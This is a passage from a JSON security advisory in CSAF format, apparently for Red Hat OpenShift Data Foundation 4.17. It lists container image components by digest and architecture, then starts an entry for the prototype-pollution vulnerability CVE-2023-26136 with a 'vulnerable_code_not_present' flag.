"product_reference": "odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le"
},
"product_reference": "odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64"
},
"product_reference": "odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x"
},
"product_reference": "odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x"
},
"product_reference": "odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le"
},
"product_reference": "odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64"
},
"product_reference": "odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le"
},
"product_reference": "odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64"
},
"product_reference": "odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x"
},
"product_reference": "odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64"
},
"product_reference": "odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le"
},
"product_reference": "odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x"
},
"product_reference": "odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64"
},
"product_reference": "odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64"
},
"product_reference": "odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x"
},
"product_reference": "odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64"
},
"product_reference": "odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le"
},
"product_reference": "odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64"
},
"product_reference": "odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x"
},
"product_reference": "odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le"
},
"product_reference": "odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64"
},
"product_reference": "odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le"
},
"product_reference": "odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x"
},
"product_reference": "odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64"
},
"product_reference": "odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x"
},
"product_reference": "odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le"
},
"product_reference": "odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64"
},
"product_reference": "odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le"
},
"product_reference": "odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x"
},
"product_reference": "odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64"
},
"product_reference": "odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64"
},
"product_reference": "odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le"
},
"product_reference": "odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x"
},
"product_reference": "odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64"
},
"product_reference": "odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64"
},
"product_reference": "odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x"
},
"product_reference": "odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le"
},
"product_reference": "odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64"
},
"product_reference": "odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x"
},
"product_reference": "odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le"
},
"product_reference": "odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64"
},
"product_reference": "odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le"
},
"product_reference": "odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
},
"product_reference": "odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
}
]
},
"vulnerabilities": [
{
"acknowledgments": [
{
"names": [
"Kokorin Vsevolod"
]
}
],
"cve": "CVE-2023-26136",
"cwe": {
"id": "CWE-1321",
"name": "Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)"
},
"discovery_date": "2023-07-03T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
